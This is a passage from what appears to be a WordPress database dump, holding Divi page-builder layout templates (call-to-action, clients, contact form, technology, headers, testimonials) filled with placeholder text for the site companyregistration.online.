make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px||104px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Limited Offer\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#a5bdc9\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Limited Offer</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Get 10 free images.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Get 10 free images.</span></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#a4bbc7\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px||40px|\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\n\n\n\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','General CTA','','publish','closed','closed','','general-cta','','','2016-05-27 19:46:40','2016-05-27 17:46:40','',0,'https://companyregistration.online/et_pb_layout/general-cta/',0,'et_pb_layout','',0),(24564,1,'2016-05-27 19:45:31','2016-05-27 17:45:31','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Clients\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Clients</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Trusted and used by many big companies.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Trusted and used by many big companies.</span></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"800px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"70px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section]','Clients','','publish','closed','closed','','clients','','','2016-05-27 19:45:31','2016-05-27 17:45:31','',0,'https://companyregistration.online/et_pb_layout/clients/',0,'et_pb_layout','',0),(24565,1,'2016-05-27 19:45:19','2016-05-27 17:45:19','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Contact\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" custom_margin=\"||14px|\"]\n\n<p>Contact</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Get in touch.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Get in touch.</span></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"48px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"12px|||\" custom_padding_phone=\"0px|||\" custom_width_px=\"780px\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"on\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font_size=\"18\" title_text_color=\"#5b666d\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#5b666d\" use_border_color=\"on\" border_color=\"#d7dce1\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"9\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\n\n[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Message\" field_type=\"text\" field_id=\"Message\" required_mark=\"on\" /]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','publish','closed','closed','','contact','','','2016-05-27 19:45:19','2016-05-27 17:45:19','',0,'https://companyregistration.online/et_pb_layout/contact/',0,'et_pb_layout','',0),(24566,1,'2016-05-27 19:42:08','2016-05-27 17:42:08','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding=\"104px||0px|\" disabled=\"off\" disabled_on=\"on|on|\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Laptop Mock-up\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"right\" sticky=\"off\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_tablet=\"0px|||\" custom_margin_last_edited=\"on|desktop\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"1\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding_tablet=\"104px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Technology\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" max_width=\"540px\" custom_margin=\"-520px||10px|\" custom_margin_last_edited=\"on|phone\" custom_margin_tablet=\"0px||10px|\"]\n\n<p>Technology</p>\n\n[/et_pb_text][et_pb_text admin_label=\"All you need is a browser.\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\" max_width=\"540px\" custom_margin=\"20px|||\"]\n\n<p>All you need is a browser.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"18px||32px|\" custom_css_main_element=\"font-weight: 300;\" max_width=\"540px\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" button_alignment=\"left\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\n\n\n\n[/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding=\"84px||0px|\" disabled=\"off\" disabled_on=\"||on\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"right\" sticky=\"off\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_tablet=\"0px|||\" custom_margin_last_edited=\"on|desktop\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"90px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#d7dce1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"4px||90px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/042-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Find quick</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Jump start</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Make it amazing</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Technology','','publish','closed','closed','','technology','','','2016-05-27 19:42:08','2016-05-27 17:42:08','',0,'https://companyregistration.online/et_pb_layout/technology/',0,'et_pb_layout','',0),(24567,1,'2016-05-27 19:41:37','2016-05-27 17:41:37','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"4\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"104px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"1_2\"][et_pb_cta admin_label=\"Header #4\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"left\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_margin=\"20%||20%|\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06_m.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||104px|\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Header #4','','publish','closed','closed','','header-4','','','2016-05-27 19:41:37','2016-05-27 17:41:37','',0,'https://companyregistration.online/et_pb_layout/header-4/',0,'et_pb_layout','',0),(24568,1,'2016-05-27 19:41:04','2016-05-27 17:41:04','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Header #1\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#7a8a97\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Hey Fellow! </span></p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Limited time offer. Get 10 free stock images.\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"5em\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_margin=\"2%||2.5%|\" custom_css_main_element=\"font-weight: 400;\" text_font_size_tablet=\"3em\" text_font_size_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_margin_tablet=\"2%||4.5%|\" text_font_size_phone=\"2em\"]\r\n\r\n<p>Limited time offer.<br /> Get 10 free stock images.</p>\r\n\r\n[/et_pb_text][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" email=\"Email Address\" use_redirect=\"off\" form_background_color=\"#3c4c5d\" input_border_radius=\"4\" title_font=\"Roboto||||\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#89a3bd\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"18\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_bg_color_hover=\"#00bcd4\" button_border_color_hover=\"#00bcd4\" button_letter_spacing_hover=\"0\" custom_css_main_element=\"width:330px;\"]\r\n\r\n[et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"][/et_pb_contact_field]\r\n\r\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Header #1','','publish','closed','closed','','header-1','','','2016-05-27 19:41:04','2016-05-27 17:41:04','',0,'https://companyregistration.online/et_pb_layout/header-1/',0,'et_pb_layout','',0),(24573,1,'2016-05-30 21:21:56','2016-05-30 21:21:56','[et_pb_section admin_label=\"section\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"120px||30px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_slider admin_label=\"Testimonials\" show_arrows=\"on\" show_pagination=\"off\" auto=\"off\" auto_ignore_hover=\"off\" parallax=\"off\" parallax_method=\"off\" remove_inner_shadow=\"on\" background_position=\"default\" background_size=\"contain\" hide_content_on_mobile=\"off\" hide_cta_on_mobile=\"off\" show_image_video_mobile=\"off\" header_text_color=\"#262e32\" body_text_color=\"#262e32\" custom_button=\"off\" button_letter_spacing=\"0\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" custom_css_slide_description=\"font-weight: 400;\" custom_css_slide_title=\"font-weight: 300;\" header_font=\"Roboto||||\" header_font_size=\"36\" body_font=\"Roboto||||\" body_font_size=\"20\" body_line_height=\"1.2em\" top_padding=\"0px\" bottom_padding=\"0px\"]\r\n\r\n[et_pb_slide heading=\"I use Testimonial Generator often. Great job, I will definitely be ordering again! I\'m good to go.\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"light\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\r\n\r\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4854 aligncenter\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05-1.png\" alt=\"05\" width=\"90\" height=\"90\">Rick F.</p>\r\n\r\n[/et_pb_slide][et_pb_slide 